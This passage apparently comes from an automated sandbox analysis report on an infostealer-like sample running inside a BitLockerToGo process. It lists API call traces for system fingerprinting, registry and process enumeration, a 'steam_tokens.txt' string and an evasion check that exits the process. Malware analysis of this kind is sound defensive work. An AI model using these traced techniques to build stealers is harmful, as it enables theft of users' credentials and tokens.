                                                                                                                                                        • Part of subcall function 027677C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0276DBC0,000000FF,?,02761C99,00000000,?,029E51D8,00000000,?), ref: 027677F2
                                                                                                                                                        • Part of subcall function 027677C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0276DBC0,000000FF,?,02761C99,00000000,?,029E51D8,00000000,?), ref: 027677F9
                                                                                                                                                        • Part of subcall function 02767850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,027511B7), ref: 02767880
                                                                                                                                                        • Part of subcall function 02767850: RtlAllocateHeap.NTDLL(00000000), ref: 02767887
                                                                                                                                                        • Part of subcall function 02767850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0276789F
                                                                                                                                                        • Part of subcall function 027678E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02766A2B), ref: 02767910
                                                                                                                                                        • Part of subcall function 027678E0: RtlAllocateHeap.NTDLL(00000000), ref: 02767917
                                                                                                                                                        • Part of subcall function 027678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0276792F
                                                                                                                                                        • Part of subcall function 02767980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,02770E00,00000000,?), ref: 027679B0
                                                                                                                                                        • Part of subcall function 02767980: RtlAllocateHeap.NTDLL(00000000), ref: 027679B7
                                                                                                                                                        • Part of subcall function 02767980: GetLocalTime.KERNEL32(?,?,?,?,?,02770E00,00000000,?), ref: 027679C4
                                                                                                                                                        • Part of subcall function 02767980: wsprintfA.USER32 ref: 027679F3
                                                                                                                                                        • Part of subcall function 02767A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,029E5C38,00000000,?,02770E10,00000000,?,00000000,00000000), ref: 02767A63
                                                                                                                                                        • Part of subcall function 02767A30: RtlAllocateHeap.NTDLL(00000000), ref: 02767A6A
                                                                                                                                                        • Part of subcall function 02767A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,029E5C38,00000000,?,02770E10,00000000,?,00000000,00000000,?), ref: 02767A7D
                                                                                                                                                        • Part of subcall function 02767B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,029E5C38,00000000,?,02770E10,00000000,?,00000000,00000000), ref: 02767B35
                                                                                                                                                        • Part of subcall function 02767B90: GetKeyboardLayoutList.USER32(00000000,00000000,027705AF), ref: 02767BE1
                                                                                                                                                        • Part of subcall function 02767B90: LocalAlloc.KERNEL32(00000040,?), ref: 02767BF9
                                                                                                                                                        • Part of subcall function 02767B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 02767C0D
                                                                                                                                                        • Part of subcall function 02767B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02767C62
                                                                                                                                                        • Part of subcall function 02767B90: LocalFree.KERNEL32(00000000), ref: 02767D22
                                                                                                                                                        • Part of subcall function 02767D80: GetSystemPowerStatus.KERNEL32(?), ref: 02767DAD
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,029E5118,00000000,?,02770E24,00000000,?,00000000,00000000,?,029E5C80,00000000,?,02770E20,00000000), ref: 0276207E
                                                                                                                                                        • Part of subcall function 02769470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 02769484
                                                                                                                                                        • Part of subcall function 02769470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 027694A5
                                                                                                                                                        • Part of subcall function 02769470: CloseHandle.KERNEL32(00000000), ref: 027694AF
                                                                                                                                                        • Part of subcall function 02767E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02767E37
                                                                                                                                                        • Part of subcall function 02767E00: RtlAllocateHeap.NTDLL(00000000), ref: 02767E3E
                                                                                                                                                        • Part of subcall function 02767E00: RegOpenKeyExA.KERNEL32(80000002,029E10E0,00000000,00020119,?), ref: 02767E5E
                                                                                                                                                        • Part of subcall function 02767E00: RegQueryValueExA.KERNEL32(?,029E5438,00000000,00000000,000000FF,000000FF), ref: 02767E7F
                                                                                                                                                        • Part of subcall function 02767E00: RegCloseKey.ADVAPI32(?), ref: 02767E92
                                                                                                                                                        • Part of subcall function 02767F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 02767FC9
                                                                                                                                                        • Part of subcall function 02767F60: GetLastError.KERNEL32 ref: 02767FD8
                                                                                                                                                        • Part of subcall function 02767ED0: GetSystemInfo.KERNEL32(02770E2C), ref: 02767F00
                                                                                                                                                        • Part of subcall function 02767ED0: wsprintfA.USER32 ref: 02767F16
                                                                                                                                                        • Part of subcall function 02768100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,029E6088,00000000,?,02770E2C,00000000,?,00000000), ref: 02768130
                                                                                                                                                        • Part of subcall function 02768100: RtlAllocateHeap.NTDLL(00000000), ref: 02768137
                                                                                                                                                        • Part of subcall function 02768100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 02768158
                                                                                                                                                        • Part of subcall function 02768100: __aulldiv.LIBCMT ref: 02768172
                                                                                                                                                        • Part of subcall function 02768100: __aulldiv.LIBCMT ref: 02768180
                                                                                                                                                        • Part of subcall function 02768100: wsprintfA.USER32 ref: 027681AC
                                                                                                                                                        • Part of subcall function 027687C0: CreateDCA.GDI32(029D0598,00000000,00000000,00000000), ref: 027687F5
                                                                                                                                                        • Part of subcall function 027687C0: GetDeviceCaps.GDI32(?,00000008), ref: 02768804
                                                                                                                                                        • Part of subcall function 027687C0: GetDeviceCaps.GDI32(?,0000000A), ref: 02768813
                                                                                                                                                        • Part of subcall function 027687C0: ReleaseDC.USER32(00000000,?), ref: 02768822
                                                                                                                                                        • Part of subcall function 027687C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,02770E28,00000000,?), ref: 0276882F
                                                                                                                                                        • Part of subcall function 027687C0: RtlAllocateHeap.NTDLL(00000000), ref: 02768836
                                                                                                                                                        • Part of subcall function 027687C0: wsprintfA.USER32 ref: 02768850
                                                                                                                                                        • Part of subcall function 027681F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 02768254
                                                                                                                                                        • Part of subcall function 02768320: RegOpenKeyExA.KERNEL32(00000000,029E30F8,00000000,00020019,00000000,027705B6), ref: 027683A4
                                                                                                                                                        • Part of subcall function 02768320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 02768426
                                                                                                                                                        • Part of subcall function 02768320: wsprintfA.USER32 ref: 02768459
                                                                                                                                                        • Part of subcall function 02768320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0276847B
                                                                                                                                                        • Part of subcall function 02768320: RegCloseKey.ADVAPI32(00000000), ref: 0276848C
                                                                                                                                                        • Part of subcall function 02768320: RegCloseKey.ADVAPI32(00000000), ref: 02768499
                                                                                                                                                        • Part of subcall function 02768680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,027705B7), ref: 027686CA
                                                                                                                                                        • Part of subcall function 02768680: Process32First.KERNEL32(?,00000128), ref: 027686DE
                                                                                                                                                        • Part of subcall function 02768680: Process32Next.KERNEL32(?,00000128), ref: 027686F3
                                                                                                                                                        • Part of subcall function 02768680: CloseHandle.KERNEL32(?), ref: 02768761
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0276265B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CapsCreateCurrentDeviceEnumHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerDefaultDevicesDirectoryDisplayErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQueryReleaseSnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2572046482-0
                                                                                                                                                      • Opcode ID: 824079c2c588f45fd10f6373657e78171126a47979693f99ad11161fb5c0c8d1
                                                                                                                                                      • Instruction ID: 5b9f7cf62b42a0c61628785adbebf37ba441757944cbd5042a840be5ea1a779d
                                                                                                                                                      • Opcode Fuzzy Hash: 824079c2c588f45fd10f6373657e78171126a47979693f99ad11161fb5c0c8d1
                                                                                                                                                      • Instruction Fuzzy Hash: 7A721E72C10119AADB1BFB50DD9DEFEB37EAF54300F6042A9991672450EF702B49CEA4
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 02756C9F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 544645111-2766056989
                                                                                                                                                      • Opcode ID: a1f85d4d128feff6c8a794bf766b9bc67388e961bc31ab34bee39463aacd34c6
                                                                                                                                                      • Instruction ID: 87864c4835aff3bcc21bfd5347aef053d89e5d8af9e2aa879a62eb4b07acaa39
                                                                                                                                                      • Opcode Fuzzy Hash: a1f85d4d128feff6c8a794bf766b9bc67388e961bc31ab34bee39463aacd34c6
                                                                                                                                                      • Instruction Fuzzy Hash: D7210574E02218EFDB04CF88C494BAEFBB5FB48314F908199D909AB351D375AA81CF80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 81ff7576077843eb4b190c2239df43ef87eb9afa53350f746e4062e8a01e7a99
                                                                                                                                                      • Instruction ID: 63c20c4b74bc86222c45ebd7a40f8dbbc21aaff9e49e26e8bfdae5f5b51a6df0
                                                                                                                                                      • Opcode Fuzzy Hash: 81ff7576077843eb4b190c2239df43ef87eb9afa53350f746e4062e8a01e7a99
                                                                                                                                                      • Instruction Fuzzy Hash: 5961E5B4D00228DFCB14DF94D988BEEB7B9BB04304F548598E81967280D7B5AF94CF91
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A820: lstrlen.KERNEL32(00000000,?,?,02765B54,02770ADB,02770ADA,?,?,02766B16,00000000,?,029D0578,?,0277110C,?,00000000), ref: 0276A82B
                                                                                                                                                        • Part of subcall function 0276A820: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A885
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,02770ACA,?,?,?,?,?,?,0276610B,?), ref: 0276512A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpylstrlen
                                                                                                                                                      • String ID: steam_tokens.txt
                                                                                                                                                      • API String ID: 2001356338-401951677
                                                                                                                                                      • Opcode ID: 53defbade45ee06f6a7f18ab90fce52acb0752d57bbc9041b6808b3bd8866602
                                                                                                                                                      • Instruction ID: aee82fc18b99fd137f73fc4fa068a717c053a9725c4a3d10ce9130d71504a897
                                                                                                                                                      • Opcode Fuzzy Hash: 53defbade45ee06f6a7f18ab90fce52acb0752d57bbc9041b6808b3bd8866602
                                                                                                                                                      • Instruction Fuzzy Hash: 08F0FB7191010866DB0AFBA4D86E9FDB73E9B14300F804168AC1662090EE356A09CBE5
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02766A17,02770AEF), ref: 0275116A
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0275117E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitInfoProcessSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 752954902-0
                                                                                                                                                      • Opcode ID: 1ec3c13018b18696ed51958c5070939da7195c1b5516361040f53e8220583923
                                                                                                                                                      • Instruction ID: 1d186b5c6e996bf301a60b186ef9c12c6c711f1f5b1eddd777d44d9ad20f83ca
                                                                                                                                                      • Opcode Fuzzy Hash: 1ec3c13018b18696ed51958c5070939da7195c1b5516361040f53e8220583923
                                                                                                                                                      • Instruction Fuzzy Hash: 4CD05E74D4430CDBCB00DFE4D84A6EDBBB8FB08222F001994DC0562340EA315891CAA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 02759E10: memcmp.MSVCRT(?,v20,00000003), ref: 02759E2D
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275B9C2
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275B9D6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3457870978-0
                                                                                                                                                      • Opcode ID: a93a9974d8ceaa273813499bce9089d8a252603e8cc9003228e7555f0b872d96
                                                                                                                                                      • Instruction ID: e16f883db57f624bd12eb4f81953384fb376b93ed780db3ebe75b1a615954361
                                                                                                                                                      • Opcode Fuzzy Hash: a93a9974d8ceaa273813499bce9089d8a252603e8cc9003228e7555f0b872d96
                                                                                                                                                      • Instruction Fuzzy Hash: 5BE1EC729101199BDF06FBA4CD9DEFEB37AAF54300F504569E906B6090EF346A49CFA0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
